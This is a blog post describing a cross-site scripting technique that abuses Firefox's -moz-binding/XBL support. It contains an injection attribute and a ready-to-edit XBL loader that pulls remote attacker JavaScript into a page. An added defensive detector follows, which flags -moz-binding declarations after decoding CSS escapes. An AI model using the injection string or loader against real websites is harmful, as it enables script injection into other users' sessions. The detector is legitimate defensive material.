Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Today I wrote a simple tool to illustrate the binding of a JavaScript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.

The process works as follows:

  1. Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
  2. Browser loads XBL document.
  3. XBL document modifies DOM to include <script src="evil_script.js"/>.
  4. Browser loads and parses JavaScript.

The required XBL document (STXSS_XBL.xml) is as follows:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
    <binding id="loader">
        <implementation>
            <constructor>
                <![CDATA[
                    //This is the STXSS XBL Loader
                    //Edit this line to the URL of the STXSS Javascript
                    var url = "http://www.your-site.com/STXSS_JS.js";
                    //Do not edit below this line
                    var scr = document.createElement("script");
                    scr.setAttribute("src",url);
                    var bodyElement = document.getElementsByTagName("html").item(0);
                    bodyElement.appendChild(scr);
                 ]]>
            </constructor>
        </implementation>
    </binding>
</bindings>
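
On the filtering side, step 1 and its note about encodings mean that a literal string match on a style attribute is not enough. The following is an added example, not code from the original post: a check that reports `-moz-binding` declarations after removing CSS comments and decoding backslash escapes. The function names and the sample inputs (including the `site.example` host) are constructed for illustration.

```javascript
// Added example: report -moz-binding declarations in a style attribute value.

// Decode CSS escapes: "\" + 1-6 hex digits (+ one optional whitespace), or "\" + any char.
function decodeCssEscapes(text) {
  return text.replace(/\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n\f])/g, (match, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
    return invalid ? "\ufffd" : String.fromCodePoint(cp);
  });
}

// Split on ";" only outside quotes and parentheses, leaving escapes intact.
function splitDeclarations(css) {
  const out = [];
  let cur = "", quote = null, depth = 0;
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (c === "\\" && i + 1 < css.length) { cur += c + css[++i]; continue; }
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === "(") depth++;
    else if (c === ")" && depth > 0) depth--;
    else if (c === ";" && depth === 0) { out.push(cur); cur = ""; continue; }
    cur += c;
  }
  out.push(cur);
  return out;
}

// Returns the decoded value of every -moz-binding declaration found.
// Comments are stripped before matching, so the check errs on the side of flagging.
function findXblBindings(style) {
  const hits = [];
  for (const decl of splitDeclarations(style.replace(/\/\*[\s\S]*?\*\//g, ""))) {
    const colon = decl.indexOf(":");
    if (colon < 0) continue;
    const prop = decodeCssEscapes(decl.slice(0, colon)).trim().toLowerCase();
    if (prop === "-moz-binding") hits.push(decodeCssEscapes(decl.slice(colon + 1)).trim());
  }
  return hits;
}

// Constructed sample inputs (site.example is a placeholder host).
const samples = [
  "-moz-binding:url('http://site.example/binding.xml#loader');",
  "-moz-b\\69nding:url(x.xml#a)",
  "background:url('a;-moz-binding:x')",
];
for (const s of samples) console.log(JSON.stringify(s), "=>", findXblBindings(s));
```

A sanitizer would drop the whole declaration (or the whole style attribute) whenever `findXblBindings` returns a non-empty list, rather than trying to rewrite the value.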